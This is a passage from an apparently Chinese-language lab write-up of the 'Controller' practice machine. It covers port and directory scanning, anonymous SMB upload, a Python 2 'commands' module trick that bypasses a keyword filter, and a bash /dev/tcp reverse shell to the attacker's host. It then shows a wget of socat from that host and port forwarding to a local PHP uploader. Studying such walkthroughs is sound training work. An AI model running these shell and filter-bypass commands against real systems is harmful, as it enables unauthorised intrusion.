khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n49152\/tcp open  msrpc        syn-ack Microsoft Windows RPC\n49153\/tcp open  msrpc        syn-ack Microsoft Windows RPC\n49154\/tcp open  msrpc        syn-ack Microsoft Windows RPC\nService Info: OSs: Linux, Windows; CPE: cpe:\/o:linux:linux_kernel, cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n|_clock-skew: 51s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 16534\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 24699\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 19523\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 60869\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: CONTROLLER, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: b0:aa:28:a5:49:7f (unknown)\n| Names:\n|   CONTROLLER&lt;00&gt;       Flags: &lt;unique&gt;&lt;active&gt;\n|   CONTROLLER&lt;03&gt;       Flags: &lt;unique&gt;&lt;active&gt;\n|   CONTROLLER&lt;20&gt;       Flags: &lt;unique&gt;&lt;active&gt;\n|   CONTROL&lt;1b&gt;          Flags: &lt;unique&gt;&lt;active&gt;\n|   CONTROL&lt;1c&gt;          Flags: &lt;group&gt;&lt;active&gt;\n|   CONTROL&lt;00&gt;          Flags: &lt;group&gt;&lt;active&gt;\n|   __SAMBA__&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;&lt;permanent&gt;\n|   __SAMBA__&lt;20&gt;        Flags: &lt;group&gt;&lt;active&gt;&lt;permanent&gt;\n| Statistics:\n|   b0:aa:28:a5:49:7f:00:00:d9:90:45:35:56:4d:00:00:f7\n|   f7:19:a5:28:00:00:7f:49:a5:28:f5:a0:7f:49:00:00:00\n|_  00:00:00:00:00:00:00:00:00:d0:00:00:00:00\n| smb2-time: \n|   date: 2024-09-05T03:13:15\n|_  start_date: N\/A<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 -q -t 100\n\/wp-login.php         (Status: 200) [Size: 8305]\n\/wp-trackback.php     (Status: 200) [Size: 136]\n\/xmlrpc.php           (Status: 405) [Size: 42]\n\/wp-signup.php        (Status: 302) [Size: 0] [--&gt; http:\/\/192.168.0.25\/wp-login.php?action=register]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text | uniq   \n\nSaltar_al_contenido\n****** CONTROLLER ******\nOtro sitio realizado con WordPress\n\n***** CONTROLLER *****\nA domain controller (DC) is a server computer that responds to security\nauthentication requests within a computer network domain. It is\na network server that is responsible for allowing host access to domain\nresources. It authenticates users, stores user account information and\nenforces security policy for a domain. It is most commonly implemented\nin Microsoft Windows environments (see Domain controller (Windows)), where it\nis the centerpiece of the Windows Active Directory service.\u2026 Seguir_leyendo\nCONTROLLER\n Publicada el 27 de junio de 2021\nCategorizado como Sin_categor\u00c3\u00ada\n\nBuscar... [Unknown INPUT type] [Buscar]\n\n***** Entradas recientes *****\n    * CONTROLLER\n***** Comentarios recientes *****\n    * Un_comentarista_de_WordPress en CONTROLLER\n\nCONTROLLER\nFunciona gracias a WordPress.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ whatweb http:\/\/$IP\nhttp:\/\/192.168.10.101 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.10.101], MetaGenerator[WordPress 5.7.2], PoweredBy[--], Script, Strict-Transport-Security[max-age=63072000; includeSubdomains], Title[CONTROLLER &amp;#8211; Otro sitio realizado con WordPress], UncommonHeaders[x-content-type-options,link], WordPress[5.7.2], X-Frame-Options[DENY]<\/code><\/pre>\n<p>\u6d4f\u89c8\u5668\u6253\u5f00\u53d1\u73b0\u5b58\u5728\u5947\u602a\u7684\u8d44\u6e90\u8bf7\u6c42\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410542.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410542.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905113425511\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6253\u5f00<code>brupsuite<\/code>\u770b\u4e00\u4e0b;<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410543.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410543.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905113705130\" \/><\/div><\/p>\n<p>\u4fee\u6539\u89c4\u5219\u4f7f\u5176\u6b63\u5e38\u76f8\u5e94\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410544.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410544.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905113925076\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410545.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410545.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905114014025\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410546.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410546.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905115446736\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<p>\u5148\u6d4b\u8bd5\u4e00\u4e0b\u5e38\u89c1\u7684\u654f\u611f\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ smbmap -H $IP\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.10.101:445      Name: 192.168.10.101            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        sysvol                                                  NO ACCESS\n        netlogon                                                NO ACCESS\n        tester                                                  READ, WRITE\n        IPC$                                                    NO ACCESS       IPC Service (Samba 4.11.6-Ubuntu)<\/code><\/pre>\n<p>\u53d1\u73b0\u6709\u4e00\u4e2a\u76ee\u5f55\u53ef\u8bfb\u53ef\u5199\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u6709\u9690\u85cf\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ smbclient \\\\\\\\$IP\\\\tester\nPassword for [WORKGROUP\\kali]:\nAnonymous login successful\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  .                                   D        0  Wed Sep  4 23:26:53 2024\n  ..                                  D        0  Sun Jun 27 13:38:00 2021\n\n                20511312 blocks of size 1024. 11633108 blocks available<\/code><\/pre>\n<p>\u53d1\u73b0\u6ca1\u4e1c\u897f\uff0c\u731c\u6d4b\u53ef\u80fd\u662f\u53ef\u4ee5\u8fd0\u884c\u67d0\u4e9b\u4e1c\u897f\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e0b\u811a\u672c\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u8fd0\u884c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410547.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410547.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905114630626\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e0d\u884c\uff0c\u8fd9\u91cc\u5b9e\u9645\u4e0a\u662f\u56e0\u4e3a\u7981\u7528\u4e86\u76f8\u5173\u6a21\u5757\uff0c\u6240\u4ee5\u5c1d\u8bd5\u522b\u7684\u529e\u6cd5\uff1a<\/p>\n<p>\u9664\u4e86 <code>os<\/code>\u4ee5\u53ca<code>subprocess<\/code>\u6a21\u5757\u4ee5\u5916\uff0c\u8fd8\u6709<code>commands<\/code>\u6a21\u5757\u53ef\u4ee5\u4f7f\u7528\uff1a<\/p>\n<blockquote>\n<p>\u6ce8\u610f\uff0c\u8be5\u5e93\u5728python3\u4e2d\u5df2\u7ecf\u5e9f\u5f03\uff0c\u5728python2\u4e2d\u5c1a\u53ef\u4f7f\u7528\uff01\u4e0a\u9762\u7684\u7f51\u9875\u5185\u5bb9\u4e5f\u63d0\u793a\u4e86\uff0c\u73b0\u5728\u4f7f\u7528\u7684\u7248\u672c\u4e3apython2\uff01<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">import commands\ncommands.getstatusoutput(&#039;ping -c 1 192.168.10.102&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410548.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410548.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905120705836\" \/><\/div><\/p>\n<p>\u91cd\u65b0\u4e0a\u4f20\u7684\u65f6\u5019\u53d1\u73b0\u524d\u9762\u4e0a\u4f20\u7684\u5df2\u7ecf\u4e0d\u89c1\u4e86\uff0c\u800c\u4e14ping\u6210\u529f\u4e86\uff0c\u8fd9\u91cc\u7684\u4f5c\u8005\u610f\u601d\u5e94\u8be5\u662f\u901a\u8fc7\u79fb\u9664\u4e0a\u4f20\u7684\u811a\u672c\u7ed9\u63d0\u793a\uff0c\u6240\u4ee5\uff0c\u8fdb\u4e00\u6b65\u53cd\u5f39shell\uff01<\/p>\n<pre><code class=\"language-bash\">import commands\ncommands.getstatusoutput(&#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.10.102\/1234 &lt;&amp;1&quot;&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410549.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410549.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905121118153\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) tester@controller:\/home\/tester$ whoami;id\ntester\nuid=1001(tester) gid=1001(tester) groups=1001(tester)\n(remote) tester@controller:\/home\/tester$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:112:65534::\/run\/sshd:\/usr\/sbin\/nologin\nserver:x:1000:1000:server:\/home\/server:\/bin\/bash\ntester:x:1001:1001::\/home\/tester:\/bin\/sh\nwebservices:x:1002:1002::\/home\/webservices:\/bin\/sh\n(remote) tester@controller:\/home\/tester$ ls -la \/home\ntotal 20\ndrwxr-xr-x  5 root        root        4096 Jun 27  2021 .\ndrwxr-xr-x 20 root        root        4096 Jun 27  2021 ..\ndrwxr-xr-x  3 server      server      4096 Jun 27  2021 server\ndrwxr-xr-x  4 tester      tester      4096 Jun 27  2021 tester\ndrwxr-xr-x  3 webservices webservices 4096 Jun 27  2021 webservices\n(remote) tester@controller:\/home\/tester$ cd \/home\/server\/\n(remote) tester@controller:\/home\/server$ ls -la\ntotal 32\ndrwxr-xr-x 3 server server 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root   root   4096 Jun 27  2021 ..\nlrwxrwxrwx 1 server server    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 server server  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 server server 3771 Feb 25  2020 .bashrc\ndrwx------ 2 server server 4096 Jun 27  2021 .cache\n-rw-r--r-- 1 server server  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 server server   75 Jun 27  2021 .selected_editor\n-rw-r--r-- 1 server server    0 Jun 27  2021 .sudo_as_admin_successful\n-rw------- 1 server server  916 Jun 27  2021 .viminfo\n(remote) tester@controller:\/home\/server$ cd ..\/tester\/\n(remote) tester@controller:\/home\/tester$ ls -la\ntotal 36\ndrwxr-xr-x 4 tester tester 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root   root   4096 Jun 27  2021 ..\nlrwxrwxrwx 1 tester tester    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 tester tester  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 tester tester 3771 Feb 25  2020 .bashrc\ndrwxrwxr-x 3 tester tester 4096 Jun 27  2021 .local\n-rw-r--r-- 1 tester tester  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 tester tester   75 Jun 27  2021 .selected_editor\n-rw------- 1 tester tester 1948 Jun 27  2021 .viminfo\ndrwxrwxr-x 2 tester tester 4096 Jun 27  2021 scripts\n(remote) tester@controller:\/home\/tester$ cd .local\/\n(remote) tester@controller:\/home\/tester\/.local$ ls -la\ntotal 12\ndrwxrwxr-x 3 tester tester 4096 Jun 27  2021 .\ndrwxr-xr-x 4 tester tester 4096 Jun 27  2021 ..\ndrwx------ 3 tester tester 4096 Jun 27  2021 share\n(remote) tester@controller:\/home\/tester\/.local$ cd ..\/scripts\/\n(remote) tester@controller:\/home\/tester\/scripts$ ls -la\ntotal 16\ndrwxrwxr-x 2 tester tester 4096 Jun 27  2021 .\ndrwxr-xr-x 4 tester tester 4096 Jun 27  2021 ..\n-rw-rw-r-- 1 tester tester 3267 Sep  5 04:13 log.txt\n-rw-rw-r-- 1 tester tester  891 Jun 27  2021 tester.py\n(remote) tester@controller:\/home\/tester\/scripts$ cat log.txt \n.............\nfile \/srv\/smb\/tester\/ping.py removed\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nfile \/srv\/smb\/tester\/ping1.py saved, testing...\nScript runned succesfully\nScript runned succesfully\nfile \/srv\/smb\/tester\/ping2.py saved, testing...\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nfile \/srv\/smb\/tester\/shell.py saved, testing...\nfile \/srv\/smb\/tester\/shell.py saved, testing...\nScript runned succesfully\nScript runned succesfully\n(remote) tester@controller:\/home\/tester\/scripts$ cat tester.py\nimport os\ndirectory = &quot;\/srv\/smb\/tester\/&quot;\n\ndef listToString(s):\n    str1 = &#039;&#039;\n    for ele in lines: \n        str1 += ele  \n    return str1    \nfor entry in os.listdir(directory):\n    files = directory + entry\n    with open(f&#039;{files}&#039;) as f:\n            lines = f.readlines()\n    lines = listToString(lines) \n    if &quot;socket&quot; in lines or &quot;os&quot; in lines or &quot;subprocess&quot; in lines:\n        os.system(f&quot;rm -f {files}&quot;)\n        os.system(f&quot;echo &#039;file {files} removed&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;)\n    else:\n        os.system(f&quot;echo &#039;file {files} saved, testing...&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;)\n        try:\n            os.system(f&quot;python2 {files}&quot;)\n        except Exception as e:\n            os.system(f&quot;echo &#039;An error ocurred: {e}&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;) \n        os.system(f&quot;rm -f {files}&quot;)\n    f.close()\nos.system(f&quot;echo &#039;Script runned succesfully&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;)\n(remote) tester@controller:\/home\/tester\/scripts$ cd ..\/..\/webservices\/\n(remote) tester@controller:\/home\/webservices$ ls -la\ntotal 36\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root        root        4096 Jun 27  2021 ..\nlrwxrwxrwx 1 webservices webservices    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 webservices webservices  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 webservices webservices 3771 Feb 25  2020 .bashrc\ndrwxrwxr-x 3 webservices webservices 4096 Jun 27  2021 .local\n-rw-r--r-- 1 webservices webservices  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 webservices webservices   75 Jun 27  2021 .selected_editor\n-rw------- 1 webservices webservices  916 Jun 27  2021 .viminfo\n-rw-rw-r-- 1 webservices webservices   14 Jun 27  2021 user.txt\n(remote) tester@controller:\/home\/webservices$ ps -aux\n............\nwebserv+     934  0.0  0.0   2608   548 ?        Ss   03:06   0:00 \/bin\/sh -c php -S 127.0.0.1:8080 -t \/srv\/www\/php\/\nwebserv+     937  0.0  0.3 225620 31544 ?        S    03:06   0:00 php -S 127.0.0.1:8080 -t \/srv\/www\/php\/\n............\n(remote) tester@controller:\/home\/webservices$ ss -tnlup\n............\ntcp   LISTEN 0      4096                                   127.0.0.1:8080         0.0.0.0:*\n............<\/code><\/pre>\n<h3>\u6587\u4ef6\u4e0a\u4f20\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">(remote) tester@controller:\/srv\/www\/php$ ls -la\ntotal 20\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 3 root        root        4096 Jun 27  2021 ..\n-rw-r--r-- 1 root        root          21 Jun 27  2021 phpinfo.php\n-rw-r--r-- 1 webservices webservices  806 Jun 27  2021 upload.php\ndrwxr-xr-x 2 webservices webservices 4096 Jun 27  2021 uploads\n(remote) tester@controller:\/srv\/www\/php$ cat phpinfo.php \n&lt;?php\n        phpinfo();\n?&gt;\n(remote) tester@controller:\/srv\/www\/php$ cat upload.php \n&lt;?php\n    if (isset($_FILES[&#039;upload&#039;])) {\n        $uploadDir = &#039;\/srv\/www\/php\/uploads\/&#039;; \/\/path you wish to store you uploaded files\n        $uploadedFile = $uploadDir . basename($_FILES[&#039;upload&#039;][&#039;name&#039;]);\n        if(move_uploaded_file($_FILES[&#039;upload&#039;][&#039;tmp_name&#039;], $uploadedFile)) {\n            echo &#039;File was uploaded successfully.&#039;;\n        } else {\n            echo &#039;There was a problem saving the uploaded file&#039;;\n        }\n        echo &#039;&lt;br\/&gt;&lt;a href=&quot;upload.php&quot;&gt;Back to Uploader&lt;\/a&gt;&#039;;\n    } else {\n    ?&gt;\n        &lt;form action=&quot;upload.php&quot; method=&quot;post&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n            &lt;label for=&quot;upload&quot;&gt;File:&lt;\/label&gt;\n            &lt;input type=&quot;file&quot; name=&quot;upload&quot; id=&quot;upload&quot;&gt;&lt;br\/&gt;\n            &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Upload&quot;&gt;\n            &lt;\/form&gt;\n        &lt;?php\n    }\n?&gt;\n(remote) tester@controller:\/srv\/www\/php$ cd uploads\/\n(remote) tester@controller:\/srv\/www\/php\/uploads$ ls -la\ntotal 8\ndrwxr-xr-x 2 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 ..<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e0a\u4f20socat\u8fdb\u884c\u8f6c\u53d1\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) tester@controller:\/srv\/www\/php\/uploads$ cd \/tmp\n(remote) tester@controller:\/tmp$ wget http:\/\/192.168.10.102:8888\/socat\n(remote) tester@controller:\/tmp$ chmod +x socat\n(remote) tester@controller:\/tmp$ ss -tnlup | grep 80\nudp    UNCONN  0       0               [fe80::a00:27ff:fecb:7eec]%enp0s3:546                               [::]:*                                               \ntcp    LISTEN  0       4096                                    127.0.0.1:8080                           0.0.0.0:*                                               \ntcp    LISTEN  0       511                                             *:80                                   *:*                                               \n(remote) tester@controller:\/tmp$ .\/socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:8080\n^C\n(remote) tester@controller:\/tmp.\/socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:8080&amp;\n[1] 14620<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410550.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410550.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905124130674\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5148\u770b\u4e00\u4e0bphpinfo:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101:8000\/phpinfo.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410551.png'><img class=\"lazyload 